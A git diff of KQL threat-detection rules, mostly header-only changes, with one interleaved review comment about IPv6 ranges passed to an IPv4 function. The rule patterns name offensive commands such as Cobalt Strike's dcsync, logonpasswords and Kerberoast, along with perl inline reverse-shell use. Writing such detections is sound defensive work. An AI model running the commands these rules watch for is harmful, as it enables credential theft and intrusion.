+// - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. 
It is best to add additional filters or use this to hunt for anomalies
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (not(((InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\CompatTelRunner.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\explorer.exe") or InitiatingProcessFolderPath =~ ":\\$WINDOWS.~BT\\Sources\\SetupHost.exe"))) and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe") or (InitiatingProcessCommandLine contains " --ms-enable-electron-run-as-node " and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql b/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql
index 899b5c50..be91f7d9 100644
--- a/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql
+++ b/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql
@@ -1,16 +1,16 @@
-// Title: Office Application Initiated Network Connection To Non-Local IP
-// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-11-10
-// Level: medium
-// Description: Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses.
-// This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292.
-// This rule will require an initial baseline and tuning that is specific to your organization.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1203
-// False Positives:
-// - You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.
-// - Office documents commonly have templates that refer to external addresses, like "sharepoint.ourcompany.com" may have to be tuned.
-// - It is highly recommended to baseline your activity and tune out common business use cases.
-
-DeviceNetworkEvents
+// Title: Office Application Initiated Network Connection To Non-Local IP
+// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-11-10
+// Level: medium
+// Description: Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses.
+// This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292.
+// This rule will require an initial baseline and tuning that is specific to your organization.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203
+// False Positives:
+// - You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.
+// - Office documents commonly have templates that refer to external addresses, like "sharepoint.ourcompany.com" may have to be tuned.
+// - It is highly recommended to baseline your activity and tune out common business use cases.
+
+DeviceNetworkEvents
 | where (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (not(((RemoteUrl endswith ".deploy.static.akamaitechnologies.com" and RemotePort == 443 and Protocol =~ "tcp") or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or ((ipv4_is_in_range(RemoteIP, "13.107.4.0/22") or ipv4_is_in_range(RemoteIP, "13.107.6.152/31") or ipv4_is_in_range(RemoteIP, "13.107.18.10/31") or ipv4_is_in_range(RemoteIP, "13.107.42.0/23") or ipv4_is_in_range(RemoteIP, "13.107.128.0/22") or ipv4_is_in_range(RemoteIP, "23.35.224.0/20") or ipv4_is_in_range(RemoteIP, "23.53.40.0/22") or ipv4_is_in_range(RemoteIP, "23.103.160.0/20") or ipv4_is_in_range(RemoteIP, "23.216.76.0/22") or ipv4_is_in_range(RemoteIP, "40.96.0.0/13") or ipv4_is_in_range(RemoteIP, "40.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.96.0.0/14") or ipv4_is_in_range(RemoteIP, "131.253.33.215/32") or ipv4_is_in_range(RemoteIP, "132.245.0.0/16") or ipv4_is_in_range(RemoteIP, "150.171.32.0/22") or ipv4_is_in_range(RemoteIP, "204.79.197.215/32") or ipv4_is_in_range(RemoteIP, "2603:1006::/40") or ipv4_is_in_range(RemoteIP, "2603:1016::/36") or ipv4_is_in_range(RemoteIP, "2603:1026::/36") or ipv4_is_in_range(RemoteIP, "2603:1036::/36") or 
ipv4_is_in_range(RemoteIP, "2603:1046::/36") or ipv4_is_in_range(RemoteIP, "2603:1056::/36") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::153/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f0::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:900::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::153/128")) and (RemotePort in~ ("80", "443"))) or ((ipv4_is_in_range(RemoteIP, "13.107.6.152/31") or ipv4_is_in_range(RemoteIP, "13.107.18.10/31") or ipv4_is_in_range(RemoteIP, "13.107.128.0/22") or ipv4_is_in_range(RemoteIP, "23.103.160.0/20") or ipv4_is_in_range(RemoteIP, "40.96.0.0/13") or ipv4_is_in_range(RemoteIP, "40.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.96.0.0/14") or ipv4_is_in_range(RemoteIP, "131.253.33.215/32") or ipv4_is_in_range(RemoteIP, "132.245.0.0/16") or ipv4_is_in_range(RemoteIP, "150.171.32.0/22") or ipv4_is_in_range(RemoteIP, "204.79.197.215/32") or ipv4_is_in_range(RemoteIP, "2603:1006::/40") or ipv4_is_in_range(RemoteIP, "2603:1016::/36") or ipv4_is_in_range(RemoteIP, "2603:1026::/36") or ipv4_is_in_range(RemoteIP, "2603:1036::/36") or ipv4_is_in_range(RemoteIP, "2603:1046::/36") or ipv4_is_in_range(RemoteIP, "2603:1056::/36") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::153/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f0::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:900::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::152/128") or ipv4_is_in_range(RemoteIP, 
"2620:1ec:a92::153/128")) and (RemotePort in~ ("143", "587", "993", "995")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "40.92.0.0/15") or ipv4_is_in_range(RemoteIP, "40.107.0.0/16") or ipv4_is_in_range(RemoteIP, "52.100.0.0/14") or ipv4_is_in_range(RemoteIP, "52.238.78.88/32") or ipv4_is_in_range(RemoteIP, "104.47.0.0/17") or ipv4_is_in_range(RemoteIP, "2a01:111:f400::/48") or ipv4_is_in_range(RemoteIP, "2a01:111:f403::/48")) and RemotePort == 443) or ((ipv4_is_in_range(RemoteIP, "40.92.0.0/15") or ipv4_is_in_range(RemoteIP, "40.107.0.0/16") or ipv4_is_in_range(RemoteIP, "52.100.0.0/14") or ipv4_is_in_range(RemoteIP, "52.238.78.88/32") or ipv4_is_in_range(RemoteIP, "104.47.0.0/17") or ipv4_is_in_range(RemoteIP, "2a01:111:f400::/48") or ipv4_is_in_range(RemoteIP, "2a01:111:f403::/48")) and RemotePort == 25) or (ipv4_is_in_range(RemoteIP, "2.16.56.0/23") or ipv4_is_in_range(RemoteIP, "2.17.248.0/21") or ipv4_is_in_range(RemoteIP, "13.107.240.0/21") or ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "23.61.224.0/20") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "23.3.88.0/22") or ipv4_is_in_range(RemoteIP, "23.216.132.0/22") or ipv4_is_in_range(RemoteIP, "40.76.0.0/14") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "51.142.136.0/22") or ipv4_is_in_range(RemoteIP, "52.160.0.0/11") or ipv4_is_in_range(RemoteIP, "95.101.96.0/21") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24")) or ((ipv4_is_in_range(RemoteIP, "13.107.6.171/32") or ipv4_is_in_range(RemoteIP, "13.107.18.15/32") or ipv4_is_in_range(RemoteIP, "13.107.140.6/32") or ipv4_is_in_range(RemoteIP, "20.64.0.0/10") or ipv4_is_in_range(RemoteIP, "52.108.0.0/14") or ipv4_is_in_range(RemoteIP, "52.244.37.168/32") or ipv4_is_in_range(RemoteIP, "2603:1006:1400::/40") or 
ipv4_is_in_range(RemoteIP, "2603:1016:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1026:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1036:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1046:1400::/40") or ipv4_is_in_range(RemoteIP, "2603:1056:1400::/40") or ipv4_is_in_range(RemoteIP, "2603:1063:2000::/38") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::15/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8fc::6/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::171/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2000::a83e:3019/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2002::8975:2d79/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2002::8975:2da8/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:7000::6fdd:6cd5/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:a004::bfeb:88cf/128")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "172.128.0.0/10") or ipv4_is_in_range(RemoteIP, "20.20.32.0/19") or ipv4_is_in_range(RemoteIP, "20.103.156.88/32") or ipv4_is_in_range(RemoteIP, "20.190.128.0/18") or ipv4_is_in_range(RemoteIP, "20.231.128.0/19") or ipv4_is_in_range(RemoteIP, "40.126.0.0/18") or ipv4_is_in_range(RemoteIP, "57.150.0.0/15") or ipv4_is_in_range(RemoteIP, "2603:1006:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1007:200::/48") or ipv4_is_in_range(RemoteIP, "2603:1016:1400::/48") or ipv4_is_in_range(RemoteIP, "2603:1017::/48") or ipv4_is_in_range(RemoteIP, "2603:1026:3000::/48") or ipv4_is_in_range(RemoteIP, "2603:1027:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1036:3000::/48") or ipv4_is_in_range(RemoteIP, "2603:1037:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1046:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1047:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1056:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1057:2::/48")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "13.64.0.0/11") or ipv4_is_in_range(RemoteIP, "13.107.6.192/32") or 
ipv4_is_in_range(RemoteIP, "13.107.9.192/32") or ipv4_is_in_range(RemoteIP, "13.89.179.14/32") or ipv4_is_in_range(RemoteIP, "20.40.0.0/14") or ipv4_is_in_range(RemoteIP, "20.48.0.0/12") or ipv4_is_in_range(RemoteIP, "20.64.0.0/12") or ipv4_is_in_range(RemoteIP, "52.123.0.0/16") or ipv4_is_in_range(RemoteIP, "52.108.0.0/14") or ipv4_is_in_range(RemoteIP, "52.136.0.0/13") or ipv4_is_in_range(RemoteIP, "57.150.0.0/15") or ipv4_is_in_range(RemoteIP, "80.239.150.67/32") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::192/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::192/128")) and RemotePort == 443 and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "13.107.136.0/22") or ipv4_is_in_range(RemoteIP, "40.108.128.0/17") or ipv4_is_in_range(RemoteIP, "52.104.0.0/14") or ipv4_is_in_range(RemoteIP, "104.146.128.0/17") or ipv4_is_in_range(RemoteIP, "150.171.40.0/22") or ipv4_is_in_range(RemoteIP, "2603:1061:1300::/40") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f8::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:908::/46") or ipv4_is_in_range(RemoteIP, "2a01:111:f402::/48")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql b/KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql
index 81433cb7..5405e6ca 100644
--- a/KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql
+++ b/KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql
@@ -1,10 +1,10 @@
-// Title: Operator Bloopers Cobalt Strike Commands
-// Author: _pete_0, TheDFIRReport
-// Date: 2022-05-06
-// Level: high
-// Description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.003, stp.1u
-
-DeviceProcessEvents
+// Title: Operator Bloopers Cobalt Strike Commands
+// Author: _pete_0, TheDFIRReport
+// Date: 2022-05-06
+// Level: high
+// Description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, stp.1u
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "psinject" or ProcessCommandLine contains "spawnas" or ProcessCommandLine contains "make_token" or ProcessCommandLine contains "remote-exec" or ProcessCommandLine contains "rev2self" or ProcessCommandLine contains "dcsync" or ProcessCommandLine contains "logonpasswords" or ProcessCommandLine contains "execute-assembly" or ProcessCommandLine contains "getsystem") and (ProcessCommandLine startswith "cmd " or ProcessCommandLine startswith "cmd.exe" or ProcessCommandLine startswith "c:\\windows\\system32\\cmd.exe")) and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql b/KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql
index 0a14b55a..52be17aa 100644
--- a/KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql
+++ b/KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql
@@ -1,10 +1,10 @@
-// Title: Operator Bloopers Cobalt Strike Modules
-// Author: _pete_0, TheDFIRReport
-// Date: 2022-05-06
-// Level: high
-// Description: Detects Cobalt Strike module/commands accidentally entered in CMD shell
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.003
-
-DeviceProcessEvents
+// Title: Operator Bloopers Cobalt Strike Modules
+// Author: _pete_0, TheDFIRReport
+// Date: 2022-05-06
+// Level: high
+// Description: Detects Cobalt Strike module/commands accidentally entered in CMD shell
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-ShareFinder" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-SMBAutoBrute" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "zerologon" or ProcessCommandLine contains "av_query") and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql b/KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql
index 71ff2c4b..1c14712e 100644
--- a/KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql
+++ b/KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql
@@ -1,10 +1,10 @@
-// Title: Osacompile Execution By Potentially Suspicious Applet/Osascript
-// Author: Sohan G (D4rkCiph3r), Red Canary (Idea)
-// Date: 2023-04-03
-// Level: medium
-// Description: Detects potential suspicious applet or osascript executing "osacompile".
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059.002
-
-DeviceProcessEvents
+// Title: Osacompile Execution By Potentially Suspicious Applet/Osascript
+// Author: Sohan G (D4rkCiph3r), Red Canary (Idea)
+// Date: 2023-04-03
+// Level: medium
+// Description: Detects potential suspicious applet or osascript executing "osacompile".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.002
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "osacompile" and (InitiatingProcessFolderPath endswith "/applet" or InitiatingProcessFolderPath endswith "/osascript")
\ No newline at end of file
diff --git a/KQL/rules/Execution/osacompile_run_only_execution.kql b/KQL/rules/Execution/osacompile_run_only_execution.kql
index 0f2d1440..1e7dd6f2 100644
--- a/KQL/rules/Execution/osacompile_run_only_execution.kql
+++ b/KQL/rules/Execution/osacompile_run_only_execution.kql
@@ -1,10 +1,10 @@
-// Title: OSACompile Run-Only Execution
-// Author: Sohan G (D4rkCiph3r)
-// Date: 2023-01-31
-// Level: high
-// Description: Detects potential suspicious run-only executions compiled using OSACompile
-// MITRE Tactic: Execution
-// Tags: attack.t1059.002, attack.execution
-
-DeviceProcessEvents
+// Title: OSACompile Run-Only Execution
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-01-31
+// Level: high
+// Description: Detects potential suspicious run-only executions compiled using OSACompile
+// MITRE Tactic: Execution
+// Tags: attack.t1059.002, attack.execution
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "osacompile" and ProcessCommandLine contains " -x " and ProcessCommandLine contains " -e "
\ No newline at end of file
diff --git a/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql b/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql
index 80463922..3c5c13f6 100644
--- a/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql
+++ b/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql
@@ -1,14 +1,14 @@
-// Title: Outbound Network Connection Initiated By Microsoft Dialer
-// Author: CertainlyP
-// Date: 2024-04-26
-// Level: high
-// Description: Detects outbound network connection initiated by Microsoft Dialer.
-// The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer.
-// This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys"
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.command-and-control, attack.t1071.001
-// False Positives:
-// - In Modern Windows systems, unable to see legitimate usage of this process, However, if an organization has legitimate purpose for this there can be false positives.
-
-DeviceNetworkEvents
+// Title: Outbound Network Connection Initiated By Microsoft Dialer
+// Author: CertainlyP
+// Date: 2024-04-26
+// Level: high
+// Description: Detects outbound network connection initiated by Microsoft Dialer.
+// The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer.
+// This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.command-and-control, attack.t1071.001
+// False Positives:
+// - In Modern Windows systems, unable to see legitimate usage of this process, However, if an organization has legitimate purpose for this there can be false positives.
+
+DeviceNetworkEvents
 | where InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dialer.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql b/KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql
index 4bb6b241..49ff20b1 100644
--- a/KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql
+++ b/KQL/rules/Execution/outlook_enableunsafeclientmailrules_setting_enabled.kql
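Review bot: The exclusion list in the `| where` line passes IPv6 literals (`"::1/128"`, `"fe80::/10"`, `"fc00::/7"`) to ipv4_is_in_range(), which only parses IPv4 and returns null for a range it cannot convert. If I read Kusto's three-valued logic correctly, `false or null` is null and `not(null)` is null, so for a public IPv4 RemoteIP the whole negated expression evaluates to null and the row is filtered out instead of alerted, leaving the rule blind to exactly the traffic it is meant to catch. Route the IPv6 entries through the IPv6 function, e.g. `ipv6_is_in_range(RemoteIP, "fe80::/10")` (likewise for `"fc00::/7"` and `"::1/128"`), or wrap each call in `coalesce(..., false)` so an unparseable range cannot poison the disjunction. The same ipv4_is_in_range-on-IPv6 pattern is visible in the preceding rule's range list, so this looks like a converter/backend issue rather than a one-off.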
@@ -1,10 +1,10 @@
-// Title: Outlook EnableUnsafeClientMailRules Setting Enabled
-// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2018-12-27
-// Level: high
-// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1202
-
-DeviceProcessEvents
+// Title: Outlook EnableUnsafeClientMailRules Setting Enabled
+// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2018-12-27
+// Level: high
+// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059, attack.t1202
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\Outlook\\Security\\EnableUnsafeClientMailRules"
\ No newline at end of file
diff --git a/KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql b/KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql
index 46ec6a4e..b3683b8c 100644
--- a/KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql
+++ b/KQL/rules/Execution/payload_decoded_and_decrypted_via_built_in_utilities.kql
@@ -1,10 +1,10 @@
-// Title: Payload Decoded and Decrypted via Built-in Utilities
-// Author: Tim Rauch (rule), Elastic (idea)
-// Date: 2022-10-17
-// Level: medium
-// Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
-// MITRE Tactic: Execution
-// Tags: attack.t1059, attack.t1204, attack.execution, attack.t1140, attack.defense-evasion, attack.s0482, attack.s0402
-
-DeviceProcessEvents
+// Title: Payload Decoded and Decrypted via Built-in Utilities
+// Author: Tim Rauch (rule), Elastic (idea)
+// Date: 2022-10-17
+// Level: medium
+// Description: Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.
+// MITRE Tactic: Execution
+// Tags: attack.t1059, attack.t1204, attack.execution, attack.t1140, attack.defense-evasion, attack.s0482, attack.s0402
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/Volumes/" and ProcessCommandLine contains "enc" and ProcessCommandLine contains "-base64" and ProcessCommandLine contains " -d ") and FolderPath endswith "/openssl"
\ No newline at end of file
diff --git a/KQL/rules/Execution/pcre_net_package_image_load.kql b/KQL/rules/Execution/pcre_net_package_image_load.kql
index 7305c0fd..27eb3c9d 100644
--- a/KQL/rules/Execution/pcre_net_package_image_load.kql
+++ b/KQL/rules/Execution/pcre_net_package_image_load.kql
@@ -1,10 +1,10 @@
-// Title: PCRE.NET Package Image Load
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-10-29
-// Level: high
-// Description: Detects processes loading modules related to PCRE.NET package
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceImageLoadEvents
+// Title: PCRE.NET Package Image Load
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-29
+// Level: high
+// Description: Detects processes loading modules related to PCRE.NET package
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceImageLoadEvents
 | where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\"
\ No newline at end of file
diff --git a/KQL/rules/Execution/pcre_net_package_temp_files.kql b/KQL/rules/Execution/pcre_net_package_temp_files.kql
index 8c7e4bf5..b3dc4af7 100644
--- a/KQL/rules/Execution/pcre_net_package_temp_files.kql
+++ b/KQL/rules/Execution/pcre_net_package_temp_files.kql
@@ -1,10 +1,10 @@
-// Title: PCRE.NET Package Temp Files
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-10-29
-// Level: high
-// Description: Detects processes creating temp files related to PCRE.NET package
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceFileEvents
+// Title: PCRE.NET Package Temp Files
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-29
+// Level: high
+// Description: Detects processes creating temp files related to PCRE.NET package
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceFileEvents
 | where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\"
\ No newline at end of file
diff --git a/KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql b/KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql
index fc9fcce2..c14a54d3 100644
--- a/KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql
+++ b/KQL/rules/Execution/pdq_deploy_remote_adminstartion_tool_execution.kql
@@ -1,12 +1,12 @@
-// Title: PDQ Deploy Remote Adminstartion Tool Execution
-// Author: frack113
-// Date: 2022-10-01
-// Level: medium
-// Description: Detect use of PDQ Deploy remote admin tool
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.lateral-movement, attack.t1072
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: PDQ Deploy Remote Adminstartion Tool Execution
+// Author: frack113
+// Date: 2022-10-01
+// Level: medium
+// Description: Detect use of PDQ Deploy remote admin tool
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.lateral-movement, attack.t1072
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where ProcessVersionInfoFileDescription =~ "PDQ Deploy Console" or ProcessVersionInfoProductName =~ "PDQ Deploy" or ProcessVersionInfoCompanyName =~ "PDQ.com" or ProcessVersionInfoOriginalFileName =~ "PDQDeployConsole.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/perl_inline_command_execution.kql b/KQL/rules/Execution/perl_inline_command_execution.kql
index 5d7cc9ad..38753a5a 100644
--- a/KQL/rules/Execution/perl_inline_command_execution.kql
+++ b/KQL/rules/Execution/perl_inline_command_execution.kql
@@ -1,10 +1,10 @@
-// Title: Perl Inline Command Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-01-02
-// Level: medium
-// Description: Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1059
-
-DeviceProcessEvents
+// Title: Perl Inline Command Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-02
+// Level: medium
+// Description: Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " -e" and (FolderPath endswith "\\perl.exe" or ProcessVersionInfoOriginalFileName =~ "perl.exe")
\ No newline at end of file
